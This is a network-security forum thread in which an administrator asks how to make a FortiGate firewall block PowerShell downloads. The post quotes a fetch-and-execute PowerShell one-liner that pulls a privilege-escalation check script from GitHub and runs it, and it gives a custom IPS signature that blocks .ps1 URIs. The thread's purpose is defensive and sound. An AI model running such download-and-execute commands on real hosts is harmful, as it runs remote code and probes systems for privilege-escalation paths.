AUT_Maverick
Visitor III
July 3, 2023
Question

fortigate block powershell


Hello Guys,

I have a simple question: how can I block Windows PowerShell commands like this?

I created a firewall policy where the source is my test client, moved the policy before rule #1 and activated DPI + Application Control + selected Windows.Powershell with action "block" in the Application Control profile. What did I do wrong? When I visit the website "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1" manually with the browser, I see that I get the FortiGate SSL cert instead of the GitHub one.

Also, in FortiAnalyzer the log tells me that traffic to raw.githubusercontent.com goes via my newly created policy. Under Application in the log there is only the application HTTP.BROWSER, but not PowerShell.

iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1');Invoke-PrivescCheck -Extended -Report PrivescCheck -Format TXT,HTML


Edit 1: I found a workaround for the .ps1 file. I created a custom IPS signature which scans the URI for .ps1 like this:

F-SBID( --revision 1; --attack_id 8614; --name "BlockPS1"; --service HTTP; --protocol tcp; --pattern ".ps1"; --context uri; --no_case; --flow from_client;)
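As an added illustration (not from the original post and not FortiGate's own engine), the following Python approximates what a `--context uri --no_case` substring signature like the one above catches and what it misses; the matching semantics are assumed to be a plain case-insensitive substring test on the request URI, which is a simplification of the real IPS engine.

```python
import re

# Paraphrase of the custom signature from the post: pattern ".ps1" in the URI
# context, case-insensitive, evaluated on client-to-server HTTP requests.
# ASSUMPTION: the engine behaves like a plain substring test on the URI.
SIGNATURE = {"pattern": ".ps1", "no_case": True}

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")


def extract_uri(request_line: str):
    """Return the request-target of an HTTP request line, or None if it is not one."""
    m = REQUEST_LINE.match(request_line.strip())
    return m.group(2) if m else None


def signature_matches(request_line: str, sig=SIGNATURE) -> bool:
    """Emulate --context uri --no_case: substring match anywhere in the URI."""
    uri = extract_uri(request_line)
    if uri is None:
        return False
    haystack, needle = uri, sig["pattern"]
    if sig["no_case"]:
        haystack, needle = haystack.lower(), needle.lower()
    return needle in haystack


# Constructed sample request lines, as the IPS engine would see them only after
# deep inspection has decrypted the TLS session (without DPI the URI is not visible).
SAMPLES = [
    "GET /itm4n/PrivescCheck/master/PrivescCheck.ps1 HTTP/1.1",   # URL from the post: caught
    "GET /scripts/Invoke-Something.PS1 HTTP/1.1",                # case variant: caught (no_case)
    "GET /download?file=check.ps1&v=2 HTTP/1.1",                 # query string: caught
    "GET /itm4n/PrivescCheck/master/PrivescCheck.txt HTTP/1.1",  # same content, other extension: missed
    "GET /raw/abc123 HTTP/1.1",                                  # extension-less URL: missed
    "GET /docs/notes.ps1x HTTP/1.1",                             # substring false positive
]


def evaluate(samples=SAMPLES) -> dict:
    """Map each sample request line to whether the signature would fire."""
    return {line: signature_matches(line) for line in samples}


if __name__ == "__main__":
    for line, hit in evaluate().items():
        print(f"{'BLOCK' if hit else 'pass '}  {line}")
```

The last three samples show why a URI-extension signature is a stopgap: it only sees decrypted HTTP, keys on the filename rather than the content, and can fire on unrelated paths that contain the same substring.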

1 reply

abarushka
Staff
July 5, 2023

Hello,


I suspect that you get the FortiGate deep inspection default certificate, since the traffic was blocked by FortiGate and the replacement message was generated using the FortiGate deep inspection default certificate.